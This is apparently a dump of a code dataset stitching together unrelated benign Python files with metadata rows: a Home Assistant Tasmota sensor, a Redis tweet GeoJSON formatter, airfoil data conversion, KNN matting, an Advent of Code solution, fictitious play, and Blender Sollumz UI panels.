hc.SPEED_METERS_PER_SECOND: SPEED_METERS_PER_SECOND,
hc.SPEED_MILES_PER_HOUR: SPEED_MILES_PER_HOUR,
hc.TEMP_CELSIUS: TEMP_CELSIUS,
hc.TEMP_FAHRENHEIT: TEMP_FAHRENHEIT,
hc.TEMP_KELVIN: TEMP_KELVIN,
hc.VOLT: ELECTRIC_POTENTIAL_VOLT,
}
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up Tasmota sensor dynamically through discovery."""
@callback
def async_discover(
tasmota_entity: HATasmotaEntity, discovery_hash: DiscoveryHashType
) -> None:
"""Discover and add a Tasmota sensor."""
async_add_entities(
[
TasmotaSensor(
tasmota_entity=tasmota_entity, discovery_hash=discovery_hash
)
]
)
hass.data[
DATA_REMOVE_DISCOVER_COMPONENT.format(sensor.DOMAIN)
] = async_dispatcher_connect(
hass,
TASMOTA_DISCOVERY_ENTITY_NEW.format(sensor.DOMAIN),
async_discover,
)
class TasmotaSensor(TasmotaAvailability, TasmotaDiscoveryUpdate, SensorEntity):
"""Representation of a Tasmota sensor."""
_tasmota_entity: tasmota_sensor.TasmotaSensor
def __init__(self, **kwds: Any) -> None:
"""Initialize the Tasmota sensor."""
self._state: Any | None = None
self._state_timestamp: datetime | None = None
super().__init__(
**kwds,
)
async def async_added_to_hass(self) -> None:
"""Subscribe to MQTT events."""
self._tasmota_entity.set_on_state_callback(self.sensor_state_updated)
await super().async_added_to_hass()
@callback
def sensor_state_updated(self, state: Any, **kwargs: Any) -> None:
"""Handle state updates."""
if self.device_class == SensorDeviceClass.TIMESTAMP:
self._state_timestamp = state
else:
self._state = state
self.async_write_ha_state()
@property
def device_class(self) -> str | None:
"""Return the device class of the sensor."""
class_or_icon = SENSOR_DEVICE_CLASS_ICON_MAP.get(
self._tasmota_entity.quantity, {}
)
return class_or_icon.get(DEVICE_CLASS)
@property
def state_class(self) -> str | None:
"""Return the state class of the sensor."""
class_or_icon = SENSOR_DEVICE_CLASS_ICON_MAP.get(
self._tasmota_entity.quantity, {}
)
return class_or_icon.get(STATE_CLASS)
@property
def entity_category(self) -> EntityCategory | None:
"""Return the category of the entity, if any."""
if self._tasmota_entity.quantity in status_sensor.SENSORS:
return EntityCategory.DIAGNOSTIC
return None
@property
def entity_registry_enabled_default(self) -> bool:
"""Return if the entity should be enabled when first added to the entity registry."""
# Hide fast changing status sensors
if self._tasmota_entity.quantity in (
hc.SENSOR_STATUS_IP,
hc.SENSOR_STATUS_RSSI,
hc.SENSOR_STATUS_SIGNAL,
hc.SENSOR_STATUS_VERSION,
):
return False
return True
@property
def icon(self) -> str | None:
"""Return the icon."""
class_or_icon = SENSOR_DEVICE_CLASS_ICON_MAP.get(
self._tasmota_entity.quantity, {}
)
return class_or_icon.get(ICON)
@property
def native_value(self) -> datetime | str | None:
"""Return the state of the entity."""
if self._state_timestamp and self.device_class == SensorDeviceClass.TIMESTAMP:
return self._state_timestamp
return self._state
@property
def force_update(self) -> bool:
"""Force update."""
return True
@property
def native_unit_of_measurement(self) -> str | None:
"""Return the unit this state is expressed in."""
return SENSOR_UNIT_MAP.get(self._tasmota_entity.unit, self._tasmota_entity.unit)
| en | 0.747474 | Support for Tasmota sensors. # A Tasmota sensor type may be mapped to either a device class or an icon, not both Set up Tasmota sensor dynamically through discovery. Discover and add a Tasmota sensor. Representation of a Tasmota sensor. Initialize the Tasmota sensor. Subscribe to MQTT events. Handle state updates. Return the device class of the sensor. Return the state class of the sensor. Return the category of the entity, if any. Return if the entity should be enabled when first added to the entity registry. # Hide fast changing status sensors Return the icon. Return the state of the entity. Force update. Return the unit this state is expressed in. | 1.924917 | 2 |
jsoncreator.py | WillCusick/HashRace | 0 | 6632522 | import json
import redis
from datetime import datetime, timedelta
max_tweets_per_load = 200
delimit = ":\\:"
len_delimit = len(delimit)
def prune(red, tweet):
breaking_point = tweet.find(":\\:")
time_added = datetime.strptime(tweet[breaking_point+len_delimit:], "%Y-%m-%d %H:%M:%S.%f")
time_now = datetime.now()
time_elapsed = time_now - time_added
if time_elapsed.total_seconds() > 600:
red.srem("tweets", tweet)
return True
return False
def geoFormat(red):
if red.scard("tweets") > 2*max_tweets_per_load:
for tweet in red.smembers("tweets"):
prune(red, tweet)
json_dict = {'type': 'FeatureCollection',
'crs': {
'type': 'name',
'properties': {
'name': 'urn:ogc:def:crs:OGC:1.3:CRS84'
}
},
'features': []}
tweet_count = 0
for tweet in red.smembers("tweets"):
if tweet_count >= max_tweets_per_load:
break
if prune(red, tweet):
continue
breaking_point = tweet.find(":\\:")
tweet_json = json.loads(tweet[:breaking_point].replace('\'','"'))
tweet_json['type'] = 'Feature'
json_dict['features'].append(tweet_json)
tweet_count += 1
return json_dict
geoFormat(redis.StrictRedis(host='localhost', port=6379, db=0))
| import json
import redis
from datetime import datetime, timedelta
max_tweets_per_load = 200
delimit = ":\\:"
len_delimit = len(delimit)
def prune(red, tweet):
breaking_point = tweet.find(":\\:")
time_added = datetime.strptime(tweet[breaking_point+len_delimit:], "%Y-%m-%d %H:%M:%S.%f")
time_now = datetime.now()
time_elapsed = time_now - time_added
if time_elapsed.total_seconds() > 600:
red.srem("tweets", tweet)
return True
return False
def geoFormat(red):
if red.scard("tweets") > 2*max_tweets_per_load:
for tweet in red.smembers("tweets"):
prune(red, tweet)
json_dict = {'type': 'FeatureCollection',
'crs': {
'type': 'name',
'properties': {
'name': 'urn:ogc:def:crs:OGC:1.3:CRS84'
}
},
'features': []}
tweet_count = 0
for tweet in red.smembers("tweets"):
if tweet_count >= max_tweets_per_load:
break
if prune(red, tweet):
continue
breaking_point = tweet.find(":\\:")
tweet_json = json.loads(tweet[:breaking_point].replace('\'','"'))
tweet_json['type'] = 'Feature'
json_dict['features'].append(tweet_json)
tweet_count += 1
return json_dict
geoFormat(redis.StrictRedis(host='localhost', port=6379, db=0))
| none | 1 | 2.709976 | 3 |
|
docs/src/data/openbemt_to_ccblade.py | ZhaoWenGuang/CCBlade.jl | 23 | 6632523 | import sys
import numpy as np
if __name__ == "__main__":
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument('--plot', action='store_true')
parser.add_argument('xtfile')
parser.add_argument('ytfile')
parser.add_argument('outfilepattern')
args = parser.parse_args()
if args.plot:
import matplotlib.pyplot as plt
with open(args.xtfile, mode='r') as f:
comment, num_alpha, num_Re = f.readline().split()
num_alpha = int(num_alpha)
num_Re = int(num_Re)
xt = np.loadtxt(f, delimiter=' ')
xt.shape = (num_alpha, num_Re, -1)
yt = np.loadtxt(args.ytfile, delimiter=' ')
yt.shape = (num_alpha, num_Re, -1)
if args.plot:
fig, (ax_cl, ax_cd) = plt.subplots(nrows=2, sharex=True)
for i in range(num_Re):
# Check that the Reynolds numbers for this index are all the same.
if np.std(xt[:, i, 1]) > 1e-10:
print(f"warning: Reynolds numbers for index i = {i} appear to differ", file=sys.stderr)
alpha = np.degrees(xt[:, i, 0])
Re = xt[0, i, 1]
cl = yt[:, i, 0]
cd = yt[:, i, 1]
cl_over_cd = cl/cd
max_cl_over_cd = np.max(cl_over_cd)
max_cl_over_cd_alpha = alpha[np.argmax(cl_over_cd)]
fname = args.outfilepattern.format(i)
header = f"Re = {Re}e6, max(Cl/Cd) = {max_cl_over_cd} at alpha = {max_cl_over_cd_alpha} deg"
print(f"fname = {fname}, {header}")
data = np.concatenate(
[
alpha[:, np.newaxis], cl[:, np.newaxis], cd[:, np.newaxis]
],
axis=1)
np.savetxt(fname, data, delimiter=' ', header=header)
if args.plot:
ax_cl.plot(alpha, cl, label=f'Re = {Re}e6')
ax_cd.plot(alpha, cd, label=f'Re = {Re}e6')
if args.plot:
ax_cl.set_xlabel('alpha, deg')
ax_cd.set_xlabel('alpha, deg')
ax_cl.set_ylabel('Lift Coefficient')
ax_cd.set_ylabel('Drag Coefficient')
ax_cl.legend()
ax_cd.legend()
plt.show()
| import sys
import numpy as np
if __name__ == "__main__":
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument('--plot', action='store_true')
parser.add_argument('xtfile')
parser.add_argument('ytfile')
parser.add_argument('outfilepattern')
args = parser.parse_args()
if args.plot:
import matplotlib.pyplot as plt
with open(args.xtfile, mode='r') as f:
comment, num_alpha, num_Re = f.readline().split()
num_alpha = int(num_alpha)
num_Re = int(num_Re)
xt = np.loadtxt(f, delimiter=' ')
xt.shape = (num_alpha, num_Re, -1)
yt = np.loadtxt(args.ytfile, delimiter=' ')
yt.shape = (num_alpha, num_Re, -1)
if args.plot:
fig, (ax_cl, ax_cd) = plt.subplots(nrows=2, sharex=True)
for i in range(num_Re):
# Check that the Reynolds numbers for this index are all the same.
if np.std(xt[:, i, 1]) > 1e-10:
print(f"warning: Reynolds numbers for index i = {i} appear to differ", file=sys.stderr)
alpha = np.degrees(xt[:, i, 0])
Re = xt[0, i, 1]
cl = yt[:, i, 0]
cd = yt[:, i, 1]
cl_over_cd = cl/cd
max_cl_over_cd = np.max(cl_over_cd)
max_cl_over_cd_alpha = alpha[np.argmax(cl_over_cd)]
fname = args.outfilepattern.format(i)
header = f"Re = {Re}e6, max(Cl/Cd) = {max_cl_over_cd} at alpha = {max_cl_over_cd_alpha} deg"
print(f"fname = {fname}, {header}")
data = np.concatenate(
[
alpha[:, np.newaxis], cl[:, np.newaxis], cd[:, np.newaxis]
],
axis=1)
np.savetxt(fname, data, delimiter=' ', header=header)
if args.plot:
ax_cl.plot(alpha, cl, label=f'Re = {Re}e6')
ax_cd.plot(alpha, cd, label=f'Re = {Re}e6')
if args.plot:
ax_cl.set_xlabel('alpha, deg')
ax_cd.set_xlabel('alpha, deg')
ax_cl.set_ylabel('Lift Coefficient')
ax_cd.set_ylabel('Drag Coefficient')
ax_cl.legend()
ax_cd.legend()
plt.show()
| en | 0.861475 | # Check that the Reynolds numbers for this index are all the same. | 2.581266 | 3 |
pymatting/laplacian/knn_laplacian.py | chendeheng611/pymatting | 0 | 6632524 | <filename>pymatting/laplacian/knn_laplacian.py
import numpy as np
import scipy.sparse
from pymatting.util.kdtree import knn
from pymatting.util.util import normalize_rows
def knn_laplacian(
image, n_neighbors=[20, 10], distance_weights=[2.0, 0.1],
):
"""
This function calculates the KNN matting Laplacian matrix as described in :cite:`chen2013knn`.
Parameters
----------
image: numpy.ndarray
Image with shape :math:`h\\times w \\times 3`
n_neighbors: list of ints
Number of neighbors to consider. If :code:`len(n_neighbors)>1` multiple nearest neighbor calculations are done and merged, defaults to `[20, 10]`, i.e. first 20 neighbors are considered and in the second run :math:`10` neighbors. The pixel distances are then weighted by the :code:`distance_weights`.
distance_weights: list of floats
Weight of distance in feature vector, defaults to `[2.0, 1.0]`.
Returns
---------
L: scipy.sparse.spmatrix
Matting Laplacian matrix
"""
h, w = image.shape[:2]
r, g, b = image.reshape(-1, 3).T
n = w * h
x = np.tile(np.linspace(0, 1, w), h)
y = np.repeat(np.linspace(0, 1, h), w)
i, j = [], []
for k, distance_weight in zip(n_neighbors, distance_weights):
f = np.stack(
[r, g, b, distance_weight * x, distance_weight * y],
axis=1,
out=np.zeros((n, 5), dtype=np.float32),
)
distances, neighbors = knn(f, f, k=k)
i.append(np.repeat(np.arange(n), k))
j.append(neighbors.flatten())
ij = np.concatenate(i + j)
ji = np.concatenate(j + i)
coo_data = np.ones(2 * sum(n_neighbors) * n)
W = scipy.sparse.csr_matrix((coo_data, (ij, ji)), (n, n))
W = normalize_rows(W)
I = scipy.sparse.identity(n)
L = I - W
return L
| <filename>pymatting/laplacian/knn_laplacian.py
import numpy as np
import scipy.sparse
from pymatting.util.kdtree import knn
from pymatting.util.util import normalize_rows
def knn_laplacian(
image, n_neighbors=[20, 10], distance_weights=[2.0, 0.1],
):
"""
This function calculates the KNN matting Laplacian matrix as described in :cite:`chen2013knn`.
Parameters
----------
image: numpy.ndarray
Image with shape :math:`h\\times w \\times 3`
n_neighbors: list of ints
Number of neighbors to consider. If :code:`len(n_neighbors)>1` multiple nearest neighbor calculations are done and merged, defaults to `[20, 10]`, i.e. first 20 neighbors are considered and in the second run :math:`10` neighbors. The pixel distances are then weighted by the :code:`distance_weights`.
distance_weights: list of floats
Weight of distance in feature vector, defaults to `[2.0, 1.0]`.
Returns
---------
L: scipy.sparse.spmatrix
Matting Laplacian matrix
"""
h, w = image.shape[:2]
r, g, b = image.reshape(-1, 3).T
n = w * h
x = np.tile(np.linspace(0, 1, w), h)
y = np.repeat(np.linspace(0, 1, h), w)
i, j = [], []
for k, distance_weight in zip(n_neighbors, distance_weights):
f = np.stack(
[r, g, b, distance_weight * x, distance_weight * y],
axis=1,
out=np.zeros((n, 5), dtype=np.float32),
)
distances, neighbors = knn(f, f, k=k)
i.append(np.repeat(np.arange(n), k))
j.append(neighbors.flatten())
ij = np.concatenate(i + j)
ji = np.concatenate(j + i)
coo_data = np.ones(2 * sum(n_neighbors) * n)
W = scipy.sparse.csr_matrix((coo_data, (ij, ji)), (n, n))
W = normalize_rows(W)
I = scipy.sparse.identity(n)
L = I - W
return L
| en | 0.801189 | This function calculates the KNN matting Laplacian matrix as described in :cite:`chen2013knn`. Parameters ---------- image: numpy.ndarray Image with shape :math:`h\\times w \\times 3` n_neighbors: list of ints Number of neighbors to consider. If :code:`len(n_neighbors)>1` multiple nearest neighbor calculations are done and merged, defaults to `[20, 10]`, i.e. first 20 neighbors are considered and in the second run :math:`10` neighbors. The pixel distances are then weighted by the :code:`distance_weights`. distance_weights: list of floats Weight of distance in feature vector, defaults to `[2.0, 1.0]`. Returns --------- L: scipy.sparse.spmatrix Matting Laplacian matrix | 3.535841 | 4 |
13/13a.py | dfwarden/Advent-of-Code-2020-Exercises | 0 | 6632525 | <reponame>dfwarden/Advent-of-Code-2020-Exercises
import copy
def run():
'''
File input is a plain text file of lines.
First line is estimate of earliest timestamp I could board bus departing seaport.
Second line are bus IDs in service that indicate how often the bus departs the seaport.
'''
with open('input') as f:
lines = f.readlines()
earliest_departure = int(lines[0])
busses = [int(bus) for bus in lines[1].rstrip().split(',') if bus != 'x']
wait_times = [] # index matches busses
for bus in busses:
wait_counter = earliest_departure
while True:
if wait_counter % bus == 0:
wait_times.append(wait_counter)
break
wait_counter += 1
# `wait_times` should now have the minutes necessary to wait for each bus
# The bus with the shortest wait has the same index as the smallest value
# in wait_times
best_departure = min(wait_times)
best_bus = busses[wait_times.index(best_departure)]
print(f'Best bus multiplied by wait time: {best_bus * (best_departure - earliest_departure)}')
if __name__ == '__main__':
run()
| import copy
def run():
'''
File input is a plain text file of lines.
First line is estimate of earliest timestamp I could board bus departing seaport.
Second line are bus IDs in service that indicate how often the bus departs the seaport.
'''
with open('input') as f:
lines = f.readlines()
earliest_departure = int(lines[0])
busses = [int(bus) for bus in lines[1].rstrip().split(',') if bus != 'x']
wait_times = [] # index matches busses
for bus in busses:
wait_counter = earliest_departure
while True:
if wait_counter % bus == 0:
wait_times.append(wait_counter)
break
wait_counter += 1
# `wait_times` should now have the minutes necessary to wait for each bus
# The bus with the shortest wait has the same index as the smallest value
# in wait_times
best_departure = min(wait_times)
best_bus = busses[wait_times.index(best_departure)]
print(f'Best bus multiplied by wait time: {best_bus * (best_departure - earliest_departure)}')
if __name__ == '__main__':
run() | en | 0.93887 | File input is a plain text file of lines. First line is estimate of earliest timestamp I could board bus departing seaport. Second line are bus IDs in service that indicate how often the bus departs the seaport. # index matches busses # `wait_times` should now have the minutes necessary to wait for each bus # The bus with the shortest wait has the same index as the smallest value # in wait_times | 3.784919 | 4 |
fictitious_play.py | Arnukk/FP_RFP_LH | 1 | 6632526 | import numpy
import math
from scipy import stats
def RandomizedFictitiousPlay(A, Epsilon):
n = len(A[0])
m = len(A)
X = numpy.matrix(numpy.zeros((m, 1), dtype=int))
Y = numpy.matrix(numpy.zeros((n, 1), dtype=int))
X[0] = 1
Y[0] = 1
numpy.random.shuffle(X)
numpy.random.shuffle(Y)
t = int(round(6*math.log(2*n*m)/pow(Epsilon, 2)))
for i in range(t):
Ax = numpy.array(numpy.transpose(A) * X).tolist()
#print Ax
Ay = numpy.array(A * Y).tolist()
#print Ay
values = Ay
probabilities = []
for item in Ay:
probabilities.append(pow(math.e, Epsilon*item[0]/2))
while True:
try:
theprobabilities = []
temp = sum(probabilities)
theprobabilities[:] = [x / temp for x in probabilities]
distrib = stats.rv_discrete(values=(values, theprobabilities))
xchoice = Ay.index(distrib.rvs(size=1)[0])
break
except:
pass
values = Ax
probabilities = []
for item in Ax:
probabilities.append(pow(math.e, -Epsilon*item[0]/2))
while True:
try:
theprobabilities = []
temp = sum(probabilities)
theprobabilities[:] = [x / temp for x in probabilities]
distrib = stats.rv_discrete(values=(values, theprobabilities))
ychoice = Ax.index(distrib.rvs(size=1)[0])
break
except:
pass
#print xchoice
X[xchoice] += 1
#print X
#print ychoice
Y[ychoice] += 1
#print Y
return X/float(t+1), Y/float(t+1)
def FictitiousPlay(A, t):
n = len(A[0])
m = len(A)
X = numpy.matrix(numpy.zeros((m, 1), dtype=int))
Y = numpy.matrix(numpy.zeros((n, 1), dtype=int))
X[0] = 1
Y[0] = 1
numpy.random.shuffle(X)
numpy.random.shuffle(Y)
for i in range(t):
Ax = numpy.array(numpy.transpose(A) * X).tolist()
Ay = numpy.array(A * Y).tolist()
xchoice = Ax.index(min(Ax))
ychoice = Ay.index(max(Ay))
#print xchoice
X[ychoice] += 1
#print X
#print ychoice
Y[xchoice] += 1
#print Y
return X/float(t+1), Y/float(t+1)
#The payoff Matrix
A = numpy.identity(5, dtype=int)
#A = numpy.array([[1, 0, 2, -2], [-1, 1, -1, 0]])
print FictitiousPlay(A, 10000)
print RandomizedFictitiousPlay(A, 0.1)
#r = 1
#while r >= 0.3:
# temp1, temp = RandomizedFictitiousPlay(A, 0.1)
# Ax = numpy.array(numpy.transpose(A) * temp1).tolist()
# Ay = numpy.array(A * temp).tolist()
# r = abs(max(Ay)[0] - min(Ax)[0])
# print r
#print temp1, temp
#while temp
#print RandomizedFictitiousPlay(A, 0.1)
#print FictitiousPlay(A, 1700) | import numpy
import math
from scipy import stats
def RandomizedFictitiousPlay(A, Epsilon):
n = len(A[0])
m = len(A)
X = numpy.matrix(numpy.zeros((m, 1), dtype=int))
Y = numpy.matrix(numpy.zeros((n, 1), dtype=int))
X[0] = 1
Y[0] = 1
numpy.random.shuffle(X)
numpy.random.shuffle(Y)
t = int(round(6*math.log(2*n*m)/pow(Epsilon, 2)))
for i in range(t):
Ax = numpy.array(numpy.transpose(A) * X).tolist()
#print Ax
Ay = numpy.array(A * Y).tolist()
#print Ay
values = Ay
probabilities = []
for item in Ay:
probabilities.append(pow(math.e, Epsilon*item[0]/2))
while True:
try:
theprobabilities = []
temp = sum(probabilities)
theprobabilities[:] = [x / temp for x in probabilities]
distrib = stats.rv_discrete(values=(values, theprobabilities))
xchoice = Ay.index(distrib.rvs(size=1)[0])
break
except:
pass
values = Ax
probabilities = []
for item in Ax:
probabilities.append(pow(math.e, -Epsilon*item[0]/2))
while True:
try:
theprobabilities = []
temp = sum(probabilities)
theprobabilities[:] = [x / temp for x in probabilities]
distrib = stats.rv_discrete(values=(values, theprobabilities))
ychoice = Ax.index(distrib.rvs(size=1)[0])
break
except:
pass
#print xchoice
X[xchoice] += 1
#print X
#print ychoice
Y[ychoice] += 1
#print Y
return X/float(t+1), Y/float(t+1)
def FictitiousPlay(A, t):
n = len(A[0])
m = len(A)
X = numpy.matrix(numpy.zeros((m, 1), dtype=int))
Y = numpy.matrix(numpy.zeros((n, 1), dtype=int))
X[0] = 1
Y[0] = 1
numpy.random.shuffle(X)
numpy.random.shuffle(Y)
for i in range(t):
Ax = numpy.array(numpy.transpose(A) * X).tolist()
Ay = numpy.array(A * Y).tolist()
xchoice = Ax.index(min(Ax))
ychoice = Ay.index(max(Ay))
#print xchoice
X[ychoice] += 1
#print X
#print ychoice
Y[xchoice] += 1
#print Y
return X/float(t+1), Y/float(t+1)
#The payoff Matrix
A = numpy.identity(5, dtype=int)
#A = numpy.array([[1, 0, 2, -2], [-1, 1, -1, 0]])
print FictitiousPlay(A, 10000)
print RandomizedFictitiousPlay(A, 0.1)
#r = 1
#while r >= 0.3:
# temp1, temp = RandomizedFictitiousPlay(A, 0.1)
# Ax = numpy.array(numpy.transpose(A) * temp1).tolist()
# Ay = numpy.array(A * temp).tolist()
# r = abs(max(Ay)[0] - min(Ax)[0])
# print r
#print temp1, temp
#while temp
#print RandomizedFictitiousPlay(A, 0.1)
#print FictitiousPlay(A, 1700) | en | 0.275124 | #print Ax #print Ay #print xchoice #print X #print ychoice #print Y #print xchoice #print X #print ychoice #print Y #The payoff Matrix #A = numpy.array([[1, 0, 2, -2], [-1, 1, -1, 0]]) #r = 1 #while r >= 0.3: # temp1, temp = RandomizedFictitiousPlay(A, 0.1) # Ax = numpy.array(numpy.transpose(A) * temp1).tolist() # Ay = numpy.array(A * temp).tolist() # r = abs(max(Ay)[0] - min(Ax)[0]) # print r #print temp1, temp #while temp #print RandomizedFictitiousPlay(A, 0.1) #print FictitiousPlay(A, 1700) | 3.2824 | 3 |
fileutils/xml.py | nicholasding/fileutils | 0 | 6632527 | <reponame>nicholasding/fileutils
from lxml import etree
def fast_iter(context, func):
for event, el in context:
func(el)
el.clear()
while el.getprevious() is not None:
del el.getparent()[0]
del context
def iterparse(fp, tag, func):
context = etree.iterparse(fp, events=('end',), tag=tag)
fast_iter(context, func)
| from lxml import etree
def fast_iter(context, func):
for event, el in context:
func(el)
el.clear()
while el.getprevious() is not None:
del el.getparent()[0]
del context
def iterparse(fp, tag, func):
context = etree.iterparse(fp, events=('end',), tag=tag)
fast_iter(context, func) | none | 1 | 2.742525 | 3 |
|
sollumz_ui.py | Loyalists/Sollumz | 4 | 6632528 | <filename>sollumz_ui.py
import bpy
from .sollumz_helper import *
from .sollumz_properties import *
class OrderListHelper:
orderkey = "name"
def filter_items(self, context, data, propname):
helper = bpy.types.UI_UL_list
items = getattr(data, propname)
ordered = helper.sort_items_by_name(items, self.orderkey)
filtered = helper.filter_items_by_name(
self.filter_name, self.bitflag_filter_item, items, propname=self.orderkey, flags=None, reverse=False)
return filtered, ordered
class SOLLUMZ_PT_import_main(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = ""
bl_parent_id = "FILE_PT_operator"
bl_options = {'HIDE_HEADER'}
bl_order = 0
@ classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_import"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.import_settings, "batch_mode")
class SOLLUMZ_PT_import_geometry(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Geometry"
bl_parent_id = "FILE_PT_operator"
bl_order = 1
@ classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_import"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.import_settings, "join_geometries")
class SOLLUMZ_PT_import_fragment(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Fragment"
bl_parent_id = "FILE_PT_operator"
bl_order = 2
@ classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_import"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.import_settings, "split_by_bone")
class SOLLUMZ_PT_import_skeleton(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Skeleton"
bl_parent_id = "FILE_PT_operator"
bl_order = 3
@ classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_import"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.import_settings, "import_ext_skeleton")
class SOLLUMZ_PT_export_main(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = ""
bl_parent_id = "FILE_PT_operator"
bl_options = {'HIDE_HEADER'}
bl_order = 0
@ classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_export"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
row = layout.row(align=True)
row.prop(operator.export_settings, "batch_mode")
sub = row.row(align=True)
sub.prop(operator.export_settings, "use_batch_own_dir",
text="", icon='NEWFOLDER')
class SOLLUMZ_PT_export_include(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Include"
bl_parent_id = "FILE_PT_operator"
bl_order = 1
@classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_export"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
sublayout = layout.column(heading="Limit to")
sublayout.enabled = (operator.export_settings.batch_mode == "OFF")
sublayout.prop(operator.export_settings, "use_selection")
sublayout.prop(operator.export_settings, "use_active_collection")
col = layout.column()
col.prop(operator.export_settings, "sollum_types")
class SOLLUMZ_PT_export_exclude(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Exclude"
bl_parent_id = "FILE_PT_operator"
bl_order = 2
@classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_export"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.export_settings, "exclude_skeleton")
class SOLLUMZ_PT_export_geometry(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Geometry"
bl_parent_id = "FILE_PT_operator"
bl_order = 3
@classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_export"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.export_settings, "use_transforms")
class SOLLUMZ_PT_export_fragment(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Fragment"
bl_parent_id = "FILE_PT_operator"
bl_order = 4
@classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_export"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.export_settings, "export_with_hi")
class SOLLUMZ_PT_TOOL_PANEL(bpy.types.Panel):
bl_label = "General Tools"
bl_idname = "SOLLUMZ_PT_TOOL_PANEL"
bl_category = "Sollumz Tools"
bl_space_type = 'VIEW_3D'
bl_region_type = 'UI'
bl_options = {'DEFAULT_CLOSED'}
bl_order = 0
def draw_header(self, context):
# Example property to display a checkbox, can be anything
self.layout.label(text="", icon="MODIFIER_DATA")
def draw(self, context):
layout = self.layout
layout.label(text="View")
layout.prop(context.scene, "hide_collision")
layout.prop(context.scene, "hide_high_lods")
layout.prop(context.scene, "hide_medium_lods")
layout.prop(context.scene, "hide_low_lods")
layout.prop(context.scene, "hide_very_low_lods")
layout.prop(context.space_data.overlay,
"show_bones", text="Show Skeleton")
class SOLLUMZ_PT_DEBUG_PANEL(bpy.types.Panel):
bl_label = "Debug"
bl_idname = "SOLLUMZ_PT_DEBUG_PANEL"
bl_category = "Sollumz Tools"
bl_space_type = 'VIEW_3D'
bl_region_type = 'UI'
bl_options = {'DEFAULT_CLOSED'}
bl_parent_id = SOLLUMZ_PT_TOOL_PANEL.bl_idname
def draw_header(self, context):
# Example property to display a checkbox, can be anything
self.layout.label(text="", icon="PREFERENCES")
def draw(self, context):
layout = self.layout
row = layout.row()
row.operator("sollumz.debug_hierarchy")
row.prop(context.scene, "debug_sollum_type")
class SOLLUMZ_PT_VERTEX_TOOL_PANEL(bpy.types.Panel):
bl_label = "Vertex Painter"
bl_idname = "SOLLUMZ_PT_VERTEX_TOOL_PANELL"
bl_space_type = 'VIEW_3D'
bl_region_type = 'UI'
bl_options = {'DEFAULT_CLOSED'}
bl_parent_id = SOLLUMZ_PT_TOOL_PANEL.bl_idname
def draw_header(self, context):
# Example property to display a checkbox, can be anything
self.layout.label(text="", icon="BRUSH_DATA")
def draw(self, context):
layout = self.layout
row = layout.row()
row.prop(context.scene, "vert_paint_color")
row.operator("sollumz.paint_vertices")
class SOLLUMZ_PT_TERRAIN_PAINTER_PANEL(bpy.types.Panel):
bl_label = "Terrain Painter"
bl_idname = "SOLLUMZ_PT_TERRAIN_PAINTER_PANEL"
bl_space_type = 'VIEW_3D'
bl_region_type = 'UI'
bl_options = {'DEFAULT_CLOSED'}
bl_parent_id = SOLLUMZ_PT_VERTEX_TOOL_PANEL.bl_idname
def draw_header(self, context):
# Example property to display a checkbox, can be anything
self.layout.label(text="", icon="IMAGE")
def draw(self, context):
layout = self.layout
row = layout.row()
row.operator("sollumz.paint_tex1")
row.operator("sollumz.paint_tex2")
row = layout.row()
